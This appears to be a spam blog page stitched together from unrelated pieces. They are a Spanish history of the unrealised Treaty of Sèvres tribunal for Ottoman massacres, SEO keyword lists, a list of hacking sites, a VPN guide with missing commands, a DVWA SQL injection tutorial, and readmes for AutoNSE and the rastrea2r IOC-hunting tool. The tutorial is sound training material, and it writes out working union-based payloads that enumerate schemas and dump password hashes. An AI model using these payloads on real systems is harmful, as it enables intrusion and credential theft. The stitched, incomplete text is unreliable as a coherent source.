El Tribunal Del Tratado De Sèvres Para Juzgar Las Masacres Otómanas

(…) es tras la Segunda Guerra Mundial cuando se ponen en marcha los tribunales internacionales de Núremberg y Tokio, creados para juzgar crímenes internacionales cometidos en la contienda por las potencias del Eje [1]. Antes de esa fecha, el profesor Molina también recuerda que hubo algunos intentos más remotos, aunque fallidos, como los que surgieron tras la Primera Guerra Mundial por parte de los Estados Aliados para crear tribunales internacionales que enjuiciasen al Káiser Guillermo II de Alemania [1]; en referencia a los llamados Juicios de Leipzig (doce procesos que se siguieron ante aquel tribunal sajón contra diecisete acusados alemanes, entre el 10 de enero de 1921 y el 3 de julio de 1922); pero unos años antes existió otro "intento fallido" previo que se contempló en el Art. 230 del Tratado de Paz de Sèvres, de 10 de agosto de 1920.

Cuando finalizó la I Guerra Mundial, las principales Potencias Aliadas [Armenia, Bélgica, Chescoslovaquia, el Estado de los serbios-croatas-eslovenos (lo que más tarde sería Yugoslavia), Francia, Gran Bretaña, Grecia, Hiyaz (hoy en día, Arabia Saudí), Italia, Japón, Polonia, Portugal y Rumanía] firmaron un armisticio con el derrotado Imperio Otómano el 30 de octubre de 1918 para que pudiera celebrarse un posterior tratado de paz que, finalmente acordaron –sin la participación de Rusia ni de Estados Unidos– en la mencionada localidad francesa de Sèvres.

Entre las disposiciones para fijar los nuevos límites territoriales, el Art. 88 dispuso que Turquía reconocía a Armenia como un estado libre e independiente; y, a continuación, el Art. 230 contemplaba que: El Gobierno turco se compromete a entregar a las Potencias aliadas las personas cuya rendición fuera requerida por ellas como responsables de masacres cometidas durante la continuidad del estado de guerra en el territorio que formaba parte del Imperio Turco en el 1º de agosto de 1914 [recordemos que el término "genocidio" lo acuñó el abogado Raphael Lemkin en 1944]. Las Potencias Aliadas se reservan el derecho de designar el tribunal que deberá juzgar a las personas bajo tal acusación y el Gobierno turco se compromete a reconocer ese tribunal. Cumplido el tiempo en que la Liga de las Naciones [en España, diríamos: Sociedad de Naciones] haya creado un tribunal competente para ocuparse de tales masacres, las Potencias Aliadas se reservan el derecho de designar el tribunal que deberá juzgar a las personas bajo tal acusación y el Gobierno turco se compromete a reconocer igualmente dicho tribunal [2]; es decir, extraditar a los responsables o juzgarlos bien en el tribunal que designen los aliados o bien en la que sería la Corte Permanente de Justicia Internacional (CPJI) de la Sociedad de Naciones.


El sultán Mehmed VI firmó aquel tratado pero se desencadenó una revolución dirigida por Kemal Atatürk desde Anatolia que concluyó con la fundación de la actual República de Turquía en 1923 y la abolición del sultanato. Como consecuencia, el gobierno de Ankara firmó el nuevo Tratado de Lausana el 24 de julio de 1923, para fijar los límites territoriales definitivos de su país, anular los previstos en el acuerdo de Sèvres y, por lo tanto, dejar también sin vigor el proceso por las masacres otómanas de la I Guerra Mundial previsto en su Art. 230 cuya virtualidad (…) fue prácticamente minima [3]. De hecho, en el Tratado de Lausana no se incluyó ninguna referencia a Armenia ni al Tratado de Sèvres entre la lista de acuerdos que se mantenían en vigor (Art. 99). De modo que el proyecto de tribunal internacional para juzgar a los turcos tampoco prosperó, pues el Tratado de Lausanne de 1923, sustituto del de Sèvres, no contenía disposiciones semejantes [2].

Cien años más tarde, la cuestión del genocidio armenio continúa siendo objeto de un debate muy polémico; por ejemplo, el 17 de marzo de 2015, la Asamblea Parlamentaria Euronest (institución parlamentaria de la Asociación Oriental entre la Unión Europea y sus socios de Europa Oriental creada en 2011) adoptó una Resolución sobre el centenario del genocidio armenio, en Ereván (capital de Armenia). En sus considerandos, esta disposición afirmó que: 2015 marca el centenario del genocidio armenio perpetrado bajo el Imperio Otomano. (…) la negación del genocidio es ampliamente reconocida como la última etapa de este, que consagra la impunidad de sus perpetradores y que puede demostrarse que abre la vía a futuros genocidios; que la falta de una condena inequívoca y oportuna del genocidio armenio contribuyó de forma significativa a que no se lograran evitar crímenes contra la humanidad posteriores. Por todo ello, condenó todas las formas de crimen contra la humanidad y genocidio, lamentando profundamente los intentos de negarlos; e invitó a Turquía a asumir su pasado.


Un mes más tarde, la Resolución del Parlamento Europeo, de 15 de abril de 2015, sobre el centenario del genocidio armenio, resultó más conciliadora. También rindió homenaje a la memoria del millón y medio de víctimas armenias inocentes que perecieron en el Imperio Otomano; recordó su Resolución de 18 de junio de 1987 en la que, entre otras cosas, reconocía que los trágicos acontecimientos que tuvieron lugar entre 1915 y 1917 contra los armenios en el territorio del Imperio Otomano representan un genocidio según la definición de la Convención para la Prevención y la Sanción del Delito de Genocidio de 1948; elogió el mensaje pronunciado por Su Santidad el Papa Francisco para honrar el centenario del genocidio armenio el 12 de abril de 2015 con un espíritu de paz y reconciliación; y confió en la reconciliación histórica del pueblo armenio y el pueblo turco en un espíritu de verdad y respeto.

Citas: [1] MOLINA FERNÁNDEZ, F. "Vigencia espacial de la ley penal". En: LASCURAÍN SÁNCHEZ, J. A. (Coord.). Manual de introducción al Derecho Penal. Madrid: BOE, 2019, p. 154. [2] FERNANDES, J. M. La Corte Penal Internacional: Soberanía versus justicia universal. Madrid: Reus, 2008, pp. 35 y 36. [3] CHINCHÓN ÁLVAREZ, J. Derecho internacional y transiciones a la democracia y la paz. Madrid: Ediciones Parthenon, 2007, p. 85. Pinacografía: Zohrab Keshishian | Serie sobre el genocidio armenio (1990-2000).

More information


  1. Viaje A Marte
  2. Curiosidades 60 Segundos
  3. Lifestyle Wake
  4. Lifestyle 750
  5. Lifestyle Of Ias Officer
  6. Lifestyle Nursery
  7. Lifestyle Young Thug
  8. Curiosidades Tecnologicas
  9. Viaje 5 Dias Pais Vasco
  10. What Does Curiosidades Means In English
  11. Lifestyle Topics
  12. Viaje Al Fin De La Noche
  13. Lifestyle Homes
  14. Viaje Util
  15. Lifestyle One
  16. Lifestyle 135
  17. Viajar 6 Meses Por El Mundo
  18. To Lifestyle Mall
  19. What Does Vieja Mean In Spanish
  20. Curiosidades Nba
  21. Curiosidades Xalmimilulco
  22. Viaje Zombie Farmer Bill Hatchet
  23. Lifestyle Overland
  24. Is Lifestyle A Niche
  25. Viaje En Ingles
  26. Curiosidades 70S Show
  27. Curiosidades 5S
  28. How Much Does Lifestyle Lift Cost
  29. Lifestyle 360 App
  30. Viaje Kenia Y Zanzibar Precio
  31. Lifestyle When Working Out
  32. Viaje Hulk
  33. Lifestyle Garden Centre
  34. Curiosidades Sangre 0 Negativo
  35. Curiosidades Del Mundo
  36. Curiosidades Now United
  37. Viaje Masculine Or Feminine
  38. Will Lifestyle India
  39. Curiosidades Y Leyendas De La Alhambra
  40. Viaje Largo Acordes
  41. Curiosidades 3 Temporada Stranger Things
  42. Lifestyle Condoms
  43. Can Lifestyle Blogs Make Money
  44. Curiosidades Animales
  45. Viaje Vs Recorrido
  46. 4 Curiosidades Sobre A Revolução Francesa
  47. Viaje 3 Pelicula
  48. Curiosidades De La Naturaleza
  49. Viaje Bruce Banner
  50. Viaje Y Punto
  51. Viaje Censurado
  52. Lifestyle Nutrition Menu
  53. Viaje Quechua
  54. Curiosidades Japon
  55. Fecha Viaje To English
  56. Lifestyle Vape
  57. Curiosidades Unorthodox
  58. Curiosidades Rick And Morty
  59. Viaje Verde Letra
  60. How Much Does Lifestyle Lift Cost
  61. Will Lifestyle Store
  62. Viaje 1004 Kilometros Para Verte
  63. Viaje Warner Madrid

Top 16 Hacking Websites

  • Packet Storm: Information Security Services, News, Files, Tools, Exploits, Advisories and Whitepapers.
  • NFOHump: Offers up-to-date .NFO files and reviews on the latest pirate software releases.
  • DEFCON: Information about the largest annual hacker convention in the US, including past speeches, video, archives, and updates on the next upcoming show as well as links and other details.
  • Offensive Security Training: Developers of Kali Linux and Exploit DB, and the creators of the Metasploit Unleashed and Penetration Testing with Kali Linux course.
  • Hack Forums: Emphasis on white hat, with categories for hacking, coding and computer security.
  • The Hacker News: The Hacker News — most trusted and widely-acknowledged online cyber security news magazine with in-depth technical coverage for cybersecurity.
  • SecurityFocus: Provides security information to all members of the security community, from end users, security hobbyists and network administrators to security consultants, IT Managers, CIOs and CSOs.
  • Hakin9: E-magazine offering in-depth looks at both attack and defense techniques and concentrates on difficult technical issues.
  • Exploit DB: An archive of exploits and vulnerable software by Offensive Security. The site collects exploits from submissions and mailing lists and concentrates them in a single database.
  • HackRead: HackRead is a News Platform that centers on InfoSec, Cyber Crime, Privacy, Surveillance, and Hacking News with full-scale reviews on Social Media Platforms.
  • Hacked Gadgets: A resource for DIY project documentation as well as general gadget and technology news.
  • KitPloit: Leading source of Security Tools, Hacking Tools, CyberSecurity and Network Security.
  • Metasploit: Find security issues, verify vulnerability mitigations & manage security assessments with Metasploit. Get the worlds best penetration testing software now.
  • Black Hat: The Black Hat Briefings have become the biggest and the most important security conference series in the world by sticking to our core value: serving the information security community by delivering timely, actionable security information in a friendly, vendor-neutral environment.
  • Phrack Magazine: Digital hacking magazine.
  • SecTools.Org: List of 75 security tools based on a 2003 vote by hackers.

How To Install Windscribe - The Best Free VPN On GNU/Linux Distros?


Why should you use Windscrive?
   Windscribe is well-known for their free VPN service but they also have a paid version. Only with a free account, you will get 10 countries to connect through and change your real IP address and 10GB of free traffic (if you use an email to sign up Windscribe), and unlimited devices.

   The Free version is awesome, but the Pro one is even better! With Pro version you will get Unlimited DataUnblock over 60 Countries and 110 CitiesConfig Generator (OpenVPN, IKEv2, SOCKS5), and full protection from R.O.B.E.R.T.

   For your information, Windscribe is one of the best VPN services in the category Free AuditValue Audit and Overall Audit in BestVPN.com Awards 2019 (Read the White Paper here). You totally can believe in Windscribe (100% no logs).

   And about R.O.B.E.R.T, it's an advanced DNS level blocker that protects you from MalwareAds and TrackersSocial trackingPornGamblingFake NewsClickbait and Cryptominers. Read more about R.O.B.E.R.T.




Anyway, Windscribe helps you:
  • Stop tracking and browse privately: Governments block content based on your location. Corporations track and sell your personal data. Get Windscribe and take back control of your privacy.
  • Unblock geo-restricted content: Windscribe masks your IP address. This gives you unrestricted and private access to entertainment, news sites, and blocked content in over 45 different countries.
  • Take your browsing history to your grave: Protect your browsing history from your network administrator, ISP, or your mom. Windscribe doesn't keep any logs, so your private data stays with you.
  • Stop leaking personal information: Prevent hackers from stealing your data while you use public WIFI and block annoying advertisers from stalking you online.
  • Go beyond basic VPN protection: For comprehensive privacy protection, use our desktop and browser combo (they're both free).

   Windscribe also supports Chrome browser, Firefox browser, Opera browser, Smart TV, Routers, Android, iOS, BlackBerry, Windows OS, Mac OS X and GNU/Linux OS, you name it.

   You can install Windscribe on Ubuntu, Debian, Fedora, CentOS, Arch Linux and their based distros too.

   But to install and safely use Internet through Windscribe, you must sign up an account first. If you already have an account then let's get started.

How to install Windscribe on Arch and Arch-based distros?
   First, open your Terminal.

   For Arch Linux and Arch-based distro users, you can install Windscribe from AUR. Run these commands without root to download and install Windscribe on your Arch:


   For other distro users, go to VPN for Linux - Windscribe choose the binary file that compatible with your distro (.DEB for Debian and Ubuntu based, .RPM for Fedora and CentOS based) and then install it.
dpkg -i [Windscribe .DEB package]
rpm -ivh [Windscribe .RPM package]



   Or you can scroll down to Pick Your Distro, click to the distro version you use, or click to the distro version that your distro is based on and follow the instructions.

   Now enter these commands to auto-start a and log in to Windscribe.

   Enter your username and password and then you can enjoy Windscribe's free VPN service.

How to use Windscribe on Linux?
   This is Windscribe list of commands (windscribe --help):
   If you want Windscribe to chooses the best location for you, use windscribe connect best.

   But if you want to choose location yourself, here is the list of Windscribe's locations:
   *Pro only
   Example, i want to connect to "Los Angeles - Dogg", i use windscribe connect Dogg.

   If you want to stop connecting through Windscribe use windscribe disconnect.

   For some reasons, you want to log out Windscribe from your device, use windscribe logout.

I hope this article is helpful for you 😃


Related word


  1. Hacking Page
  2. Hacking With Raspberry Pi
  3. Is Hacking Illegal
  4. Hacker Wifi Password
  5. Hacker Kevin Mitnick
  6. Hacking Tutorials
  7. Pentest Devices
  8. Hacking Software
  9. Hacking
  10. Pentesting And Ethical Hacking
  11. Pentest Partners
  12. Basic Pentest 1 Walkthrough
  13. Pentesterlab

Learning Web Pentesting With DVWA Part 2: SQL Injection

In the last article Learning Web Pentesting With DVWA Part 1: Installation, you were given a glimpse of SQL injection when we installed the DVWA app. In this article we will explain what we did at the end of that article and much more.
Lets start by defining what SQL injection is, OWASP defines it as: "A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands."
Which basically means that we can use a simple (vulnerable) input field in our web application to get information from the database of the server which hosts the web application. We can command and control (at certain times) the database of the web application or even the server.
In this article we are going to perform SQL injection attack on DVWA, so let's jump in. On the DVWA welcome page click on SQL Injection navigation link. We are presented with a page with an input field for User ID.
Now lets try to input a value like 1 in the input field. We can see a response from server telling us the firstname and surname of the user associated with User ID 1.
If we try to enter a user id which doesn't exist, we get no data back from the server. To determine whether an input field is vulnerable to SQL injection, we first start by sending a single quote (') as input. Which returns an SQL error.
We saw this in the previous article and we also talked about injection point in it. Before diving deeper into how this vulnerability can be exploited lets try to understand how this error might have occurred. Lets try to build the SQL query that the server might be trying to execute. Say the query looks something like this:
SELECT first_name, sur_name FROM users WHERE user_id = '1';
The 1 in this query is the value supplied by the user in the User ID input field. When we input a single quote in the User ID input field, the query looks like this:
SELECT first_name, sur_name FROM users WHERE user_id = ''';
The quotes around the input provided in the User ID input field are from the server side application code. The error is due to the extra single quote present in the query. Now if we specify a comment after the single quote like this:
'-- -
or
'#
we should get no error. Now our crafted query looks like this:
SELECT first_name, sur_name FROM users WHERE user_id = ''-- -';
or
SELECT first_name, sur_name FROM users WHERE user_id = ''#';
since everything after the # or -- - are commented out, the query will ignore the extra single quote added by the server side app and whatever comes after it and will not generate any error. However the query returns nothing because we specified nothing ('') as the user_id.
After knowing how things might be working on the server side, we will start to attack the application.
First of all we will try to determine the number of columns that the query outputs because if we try a query which will output the number of columns greater or smaller than what the original query outputs then our query is going to get an error. So we will first figure out the exact number of columns that the query outputs and we will do that with the help of order by sql statement like this:
' order by 1-- -
This MySQL server might execute the query as:
SELECT first_name, sur_name FROM users WHERE user_id = '' order by 1-- -';
you get the idea now.
if we don't get any error message, we will increase the number to 2 like this:
' order by 2-- -
still no error message, lets add another:
' order by 3-- -
and there we go we have an error message. Which tells us the number of columns that the server query selects is 2 because it erred out at 3.
Now lets use the union select SQL statement to get information about the database itself.
' union select null, version()-- -
You should first understand what a union select statement does and only then can you understand what we are doing here. You can read about it here.
We have used null as one column since we need to match the number of columns from the server query which is two. null will act as a dummy column here which will give no output and the second column which in our case here is the version() command will output the database version. Notice the output from the application, nothing is shown for First name since we specified null for it and the maria db version will be displayed in Surname.
Now lets check who the database user is using the user() function of mariadb:
' union select null, user()-- -
After clicking the submit button you should be able to see the user of the database in surname.

Now lets get some information about the databases in the database.
Lets determine the names of databases from INFORMATION_SCHEMA.SCHEMATA by entering following input in the User ID field:
' union select null, SCHEMA_NAME from INFORMATION_SCHEMA.SCHEMATA-- -
This lists two databases dvwa and information_schema. information_schema is the built in database. Lets look at the dvwa database.
Get table names for dvwa database from INFORMATION_SCHEMA.TABLES
' union select null, TABLE_NAME from INFORMATION_SCHEMA.TABLES-- -
It gives a huge number of tables that are present in dvwa database. But what we are really interested in is the users table as it is most likely to contain user passwords. But first we need to determine columns of that table and we will do that by querying INFORMATION_SCHEMA.COLUMNS like this:
' union select null, COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = 'users'-- -

We can see the password column in the output now lets get those passwords:
' union select user, password from users-- -
Of-course those are the hashes and not plain text passwords. You need to crack them.
Hope you learned something about SQL injection in this article. See you next time.

References:

1. SQL Injection: https://owasp.org/www-community/attacks/SQL_Injection
2. MySQL UNION: https://www.mysqltutorial.org/sql-union-mysql.aspx
3. Chapter 25 INFORMATION_SCHEMA Tables: https://dev.mysql.com/doc/refman/8.0/en/information-schema.html

Related articles


AutoNSE - Massive NSE (Nmap Scripting Engine) AutoSploit And AutoScanner


Massive NSE (Nmap Scripting Engine) AutoSploit and AutoScanner. The Nmap Scripting Engine (NSE) is one of Nmap's most powerful and flexible features. It allows users to write (and share) simple scripts (using the Lua programming language ) to automate a wide variety of networking tasks. Those scripts are executed in parallel with the speed and efficiency you expect from Nmap. Users can rely on the growing and diverse set of scripts distributed with Nmap, or write their own to meet custom needs. For more informations https://nmap.org/book/man-nse.html

Installation
$ git clone https://github.com/m4ll0k/AutoNSE.git
$ cd AutoNSE
$ bash autonse.sh

Exmaples
$ bash autonse.sh




More info
  1. Hacker Typer
  2. Pentest Wordpress
  3. Pentest Blog
  4. Hacker Typer
  5. Pentest Environment
  6. Hacker Box

Rastrea2R - Collecting & Hunting For IOCs With Gusto And Style



Ever wanted to turn your AV console into an Incident Response & Threat Hunting machine? Rastrea2r (pronounced "rastreador" - hunter- in Spanish) is a multi-platform open source tool that allows incident responders and SOC analysts to triage suspect systems and hunt for Indicators of Compromise (IOCs) across thousands of endpoints in minutes. To parse and collect artifacts of interest from remote systems (including memory dumps), rastrea2r can execute sysinternal, system commands and other 3rd party tools across multiples endpoints, saving the output to a centralized share for automated or manual analysis. By using a client/server RESTful API, rastrea2r can also hunt for IOCs on disk and memory across multiple systems using YARA rules. As a command line tool, rastrea2r can be easily integrated within McAfee ePO, as well as other AV consoles and orchestration tools, allowing incident responders and SOC analysts to collect forensic evidence and hunt for IOCs without the need for an additional agent, with 'gusto' and style!


Dependencies
  • Python 2.7.x
  • git
  • bottle
  • requests
  • yara-python

Quickstart
  • Clone the project to your local directory (or download the zip file of the project)
$git clone https://github.com/rastrea2r/rastrea2r.git
$cd rastrea2r
  • All the dependencies necessary for the tool to run can be installed within a virtual environment via the provided makefile.
$make help
help - display this makefile's help information
venv - create a virtual environment for development
clean - clean all files using .gitignore rules
scrub - clean all files, even untracked files
test - run tests
test-verbose - run tests [verbosely]
check-coverage - perform test coverage checks
check-style - perform pep8 check
fix-style - perform check with autopep8 fixes
docs - generate project documentation
check-docs - quick check docs consistency
serve-docs - serve project html documentation
dist - create a wheel distribution package
dist-test - test a wheel distribution package
dist-upload - upload a wheel distribution package
  • Create a virtual environment with all dependencies
$make venv
//Upon successful creation of the virtualenvironment, enter the virtualenvironment as instructed, for ex:
$source /Users/ssbhat/.venvs/rastrea2r/bin/activate
  • Start the rastrea2r server by going to $PROJECT_HOME/src/rastrea2r/server folder
$cd src/rastrea2r/server/
$python rastrea2r_server_v0.3.py
Bottle v0.12.13 server starting up (using WSGIRefServer())...
Listening on http://0.0.0.0:8080/
  • Now execute the client program, depending on which platform you are trying to scan choose the target python script appropriately. Currently Windows, Linux and Mac platforms are supported.
$python rastrea2r_osx_v0.3.py -h
usage: rastrea2r_osx_v0.3.py [-h] [-v] {yara-disk,yara-mem,triage} ...

Rastrea2r RESTful remote Yara/Triage tool for Incident Responders

positional arguments: {yara-disk,yara-mem,triage}

modes of operation
yara-disk Yara scan for file/directory objects on disk
yara-mem Yara scan for running processes in memory
triage Collect triage information from endpoint

optional arguments:
-h, --help show this help message and exit
-v, --version show program's version number and exit


Further more, the available options under each command can be viewed by executing the help option. i,e

$python rastrea2r_osx_v0.3.py yara-disk -h
usage: rastrea2r_osx_v0.3.py yara-disk [-h] [-s] path server rule

positional arguments:
path File or directory path to scan
server rastrea2r REST server
rule Yara rule on REST server

optional arguments:
-h, --help show this help message and exit
-s, --silent Suppresses standard output
  • For ex, on a Mac or Unix system you would do:
$cd src/rastrea2r/osx/

$python rastrea2r_osx_v0.3.py yara-disk /opt http://127.0.0.1:8080/ test.yar

Executing rastrea2r on Windows

Currently Supported functionality
  • yara-disk: Yara scan for file/directory objects on disk
  • yara-mem: Yara scan for running processes in memory
  • memdump: Acquires a memory dump from the endpoint ** Windows only
  • triage: Collects triage information from the endpoint ** Windows only

Notes
For memdump and triage modules, SMB shares must be set up in this specific way:
  • Binaries (sysinternals, batch files and others) must be located in a shared folder called TOOLS (read only)
    \path-to-share-foldertools
  • Output is sent to a shared folder called DATA (write only)
    \path-to-share-folderdata
  • For yara-mem and yara-disk scans, the yara rules must be in the same directory where the server is executed from.
  • The RESTful API server stores data received in a file called results.txt in the same directory.

Contributing to rastrea2r project
The Developer Documentation provides complete information on how to contribute to rastrea2r project

Demo videos on Youtube

Presentations

Credits & References



Related links